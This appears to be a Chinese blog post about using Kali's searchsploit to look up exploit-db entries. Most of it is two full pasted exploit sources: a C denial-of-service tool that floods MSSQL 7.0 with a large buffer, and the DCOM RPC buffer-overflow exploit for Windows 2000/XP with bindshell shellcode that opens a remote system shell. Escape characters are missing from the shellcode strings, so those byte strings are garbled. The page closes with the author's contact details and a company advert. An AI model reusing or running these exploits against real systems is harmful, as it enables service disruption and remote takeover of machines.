Searchsploit
Searchsploit会通过本地的exploit-db, 查找软件漏洞信息
打开kali的命令行, 输入:
searchsploit
查看系统帮助
查找mssql的漏洞
如果要查找 mssql的漏洞, 命令如下, 会找到所有和mssql相关的漏洞信息, 后面还有相关的漏洞描述信息:
searchsploit mssql
要看相关的漏洞描述, 如果要看mysql7.0的远程DOS漏洞 , 把漏洞描述后面的路径用编辑器打开即可:
leafpad /usr/share/exploitdb/platforms/./windows/dos/562.c
文本文件里面的内容为漏洞说明文件和漏洞利用文件:
/* Microsoft mssql 7.0 server is vulnerable to denial of service attack * By sending a large buffer with specified data an attacker can stop the service * "mssqlserver" the error noticed is different according to services' pack but the result is always * the same one. * Exception Codes = c0000005 * vulnerable: MSSQL7.0 sp0 - sp1 - sp2 - sp3 * This code is for educational purposes, I am not responsible for your acts * Greets:sm0g DEADm|x #crack.fr itmaroc and evryone who I forgot */ #include <stdio.h> #include <winsock.h> #pragma comment(lib,"ws2_32") u_long resolv(char*); void main(int argc, char **argv) { WSADATA WinsockData; SOCKET s; int i; struct sockaddr_in vulh; char buffer[700000]; for(i=0;i<700000;i+=16)memcpy(buffer+i,"x10x00x00x10xccxccxccxccxccxccxccxccxccxccxccxcc",16); if (argc!=3) { printf(" MSSQL denial of service "); printf(" by securma massine "); printf("Cet outil a ete cree pour test ,je ne suis en aucun cas responsable des degats que vous pouvez en faire "); printf("Syntaxe: MSSQLdos <ip> <port> "); exit(1); } WSAStartup(0x101,&WinsockData); s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); ZeroMemory(&vulh,sizeof(vulh)); vulh.sin_family=AF_INET; vulh.sin_addr.s_addr=resolv(argv[1]); vulh.sin_port=htons(atoi(argv[2])); if (connect(s,(struct sockaddr*)&vulh,sizeof(vulh))==SOCKET_ERROR) { printf("Impossible de se connecter...le port est en generale 1433... "); exit(1); } { send(s,buffer,sizeof(buffer),0); printf("Data envoyes... "); } printf(" attendez quelques secondes et verifiez que le serveur ne repond plus. "); closesocket(s); WSACleanup(); } u_long resolv(char *host_name) { struct in_addr addr; struct hostent *host_ent; if ((addr.s_addr = inet_addr(host_name)) == -1) { if (!(host_ent = gethostbyname(host_name))) { printf ("Erreur DNS : Impossible de résoudre l'adresse %s !!! ",host_name); exit(1); } CopyMemory((char *)&addr.s_addr,host_ent->h_addr,host_ent->h_length); } return addr.s_addr; } // milw0rm.com [2004-09-29]
查找和window XP有关的漏洞
searchsploit /xp
查看漏洞利用文件:
leafpad /usr/share/exploitdb/platforms/./windows/remote/66.c
/* DCOM RPC Overflow Discovered by LSD - Exploit Based on Xfocus's Code Written by H D Moore <hdm [at] metasploit.com> - Usage: ./dcom <Target ID> <Target IP> - Targets: - 0 Windows 2000 SP0 (english) - 1 Windows 2000 SP1 (english) - 2 Windows 2000 SP2 (english) - 3 Windows 2000 SP3 (english) - 4 Windows 2000 SP4 (english) - 5 Windows XP SP0 (english) - 6 Windows XP SP1 (english) */ #include <stdio.h> #include <stdlib.h> #include <error.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <unistd.h> #include <netdb.h> #include <fcntl.h> #include <unistd.h> unsigned char bindstr[]={ 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00, 0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00, 0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00, 0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00, 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00}; unsigned char request1[]={ 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03 ,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00 ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45 ,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E ,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D ,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41 ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00 ,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45 ,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00 ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00 ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03 ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00 ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29 ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00 ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00 ,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10 ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10 ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09 ,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00 ,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00 ,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00 ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00 ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01 ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03 ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00 ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E ,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00 ,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00 ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00 ,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00 ,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00}; unsigned char request2[]={ 0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00 ,0x00,0x00,0x5C,0x00,0x5C,0x00}; unsigned char request3[]={ 0x5C,0x00 ,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00 ,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00 ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00 ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00}; unsigned char *targets [] = { "Windows 2000 SP0 (english)", "Windows 2000 SP1 (english)", "Windows 2000 SP2 (english)", "Windows 2000 SP3 (english)", "Windows 2000 SP4 (english)", "Windows XP SP0 (english)", "Windows XP SP1 (english)", NULL }; unsigned long offsets [] = { 0x77e81674, 0x77e829ec, 0x77e824b5, 0x77e8367a, 0x77f92a9b, 0x77e9afe3, 0x77e626ba, }; unsigned char sc[]= "x46x00x58x00x4Ex00x42x00x46x00x58x00" "x46x00x58x00x4Ex00x42x00x46x00x58x00x46x00x58x00" "x46x00x58x00x46x00x58x00" "xffxffxffxff" /* return address */ "xccxe0xfdx7f" /* primary thread data block */ "xccxe0xfdx7f" /* primary thread data block */ /* port 4444 bindshell */ "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90xebx19x5ex31xc9x81xe9x89xff" "xffxffx81x36x80xbfx32x94x81xeexfcxffxffxffxe2xf2" "xebx05xe8xe2xffxffxffx03x53x06x1fx74x57x75x95x80" "xbfxbbx92x7fx89x5ax1axcexb1xdex7cxe1xbex32x94x09" "xf9x3ax6bxb6xd7x9fx4dx85x71xdaxc6x81xbfx32x1dxc6" "xb3x5axf8xecxbfx32xfcxb3x8dx1cxf0xe8xc8x41xa6xdf" "xebxcdxc2x88x36x74x90x7fx89x5axe6x7ex0cx24x7cxad" "xbex32x94x09xf9x22x6bxb6xd7x4cx4cx62xccxdax8ax81" "xbfx32x1dxc6xabxcdxe2x84xd7xf9x79x7cx84xdax9ax81" "xbfx32x1dxc6xa7xcdxe2x84xd7xebx9dx75x12xdax6ax80" "xbfx32x1dxc6xa3xcdxe2x84xd7x96x8exf0x78xdax7ax80" "xbfx32x1dxc6x9fxcdxe2x84xd7x96x39xaex56xdax4ax80" "xbfx32x1dxc6x9bxcdxe2x84xd7xd7xddx06xf6xdax5ax80" "xbfx32x1dxc6x97xcdxe2x84xd7xd5xedx46xc6xdax2ax80" "xbfx32x1dxc6x93x01x6bx01x53xa2x95x80xbfx66xfcx81" "xbex32x94x7fxe9x2axc4xd0xefx62xd4xd0xffx62x6bxd6" "xa3xb9x4cxd7xe8x5ax96x80xaex6ex1fx4cxd5x24xc5xd3" "x40x64xb4xd7xecxcdxc2xa4xe8x63xc7x7fxe9x1ax1fx50" "xd7x57xecxe5xbfx5axf7xedxdbx1cx1dxe6x8fxb1x78xd4" "x32x0exb0xb3x7fx01x5dx03x7ex27x3fx62x42xf4xd0xa4" "xafx76x6axc4x9bx0fx1dxd4x9bx7ax1dxd4x9bx7ex1dxd4" "x9bx62x19xc4x9bx22xc0xd0xeex63xc5xeaxbex63xc5x7f" "xc9x02xc5x7fxe9x22x1fx4cxd5xcdx6bxb1x40x64x98x0b" "x77x65x6bxd6x93xcdxc2x94xeax64xf0x21x8fx32x94x80" "x3axf2xecx8cx34x72x98x0bxcfx2ex39x0bxd7x3ax7fx89" "x34x72xa0x0bx17x8ax94x80xbfxb9x51xdexe2xf0x90x80" "xecx67xc2xd7x34x5exb0x98x34x77xa8x0bxebx37xecx83" "x6axb9xdex98x34x68xb4x83x62xd1xa6xc9x34x06x1fx83" "x4ax01x6bx7cx8cxf2x38xbax7bx46x93x41x70x3fx97x78" "x54xc0xafxfcx9bx26xe1x61x34x68xb0x83x62x54x1fx8c" "xf4xb9xcex9cxbcxefx1fx84x34x31x51x6bxbdx01x54x0b" "x6ax6dxcaxddxe4xf0x90x80x2fxa2x04"; unsigned char request4[]={ 0x01,0x10 ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00 ,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C ,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00 }; /* ripped from TESO code */ void shell (int sock) { int l; char buf[512]; fd_set rfds; while (1) { FD_SET (0, &rfds); FD_SET (sock, &rfds); select (sock + 1, &rfds, NULL, NULL, NULL); if (FD_ISSET (0, &rfds)) { l = read (0, buf, sizeof (buf)); if (l <= 0) { printf(" - Connection closed by local user "); exit (EXIT_FAILURE); } write (sock, buf, l); } if (FD_ISSET (sock, &rfds)) { l = read (sock, buf, sizeof (buf)); if (l == 0) { printf (" - Connection closed by remote host. "); exit (EXIT_FAILURE); } else if (l < 0) { printf (" - Read failure "); exit (EXIT_FAILURE); } write (1, buf, l); } } } int main(int argc, char **argv) { int sock; int len,len1; unsigned int target_id; unsigned long ret; struct sockaddr_in target_ip; unsigned short port = 135; unsigned char buf1[0x1000]; unsigned char buf2[0x1000]; printf("--------------------------------------------------------- "); printf("- Remote DCOM RPC Buffer Overflow Exploit "); printf("- Original code by FlashSky and Benjurry "); printf("- Rewritten by HDM <hdm [at] metasploit.com> "); if(argc<3) { printf("- Usage: %s <Target ID> <Target IP> ", argv[0]); printf("- Targets: "); for (len=0; targets[len] != NULL; len++) { printf("- %d %s ", len, targets[len]); } printf(" "); exit(1); } /* yeah, get over it :) */ target_id = atoi(argv[1]); ret = offsets[target_id]; printf("- Using return address of 0x%.8x ", ret); memcpy(sc+36, (unsigned char *) &ret, 4); target_ip.sin_family = AF_INET; target_ip.sin_addr.s_addr = inet_addr(argv[2]); target_ip.sin_port = htons(port); if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1) { perror("- Socket"); return(0); } if(connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip)) != 0) { perror("- Connect"); return(0); } len=sizeof(sc); memcpy(buf2,request1,sizeof(request1)); len1=sizeof(request1); *(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(sc)/2; *(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(sc)/2; memcpy(buf2+len1,request2,sizeof(request2)); len1=len1+sizeof(request2); memcpy(buf2+len1,sc,sizeof(sc)); len1=len1+sizeof(sc); memcpy(buf2+len1,request3,sizeof(request3)); len1=len1+sizeof(request3); memcpy(buf2+len1,request4,sizeof(request4)); len1=len1+sizeof(request4); *(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(sc)-0xc; *(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(sc)-0xc; *(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(sc)-0xc; *(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(sc)-0xc; *(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(sc)-0xc; *(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(sc)-0xc; *(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(sc)-0xc; *(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(sc)-0xc; if (send(sock,bindstr,sizeof(bindstr),0)== -1) { perror("- Send"); return(0); } len=recv(sock, buf1, 1000, 0); if (send(sock,buf2,len1,0)== -1) { perror("- Send"); return(0); } close(sock); sleep(1); target_ip.sin_family = AF_INET; target_ip.sin_addr.s_addr = inet_addr(argv[2]); target_ip.sin_port = htons(4444); if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1) { perror("- Socket"); return(0); } if(connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip)) != 0) { printf("- Exploit appeared to have failed. "); return(0); } printf("- Dropping to System Shell... "); shell(sock); return(0); } // milw0rm.com [2003-07-26]
查找apple的漏洞
searchsploit apple
作者: NONO
出处:http://www.cnblogs.com/diligenceday/
QQ:287101329
微信:18101055830
厦门点燃未来网络科技有限公司, 是厦门最好的微信应用, 小程序, 微信网站, 公众号开发公司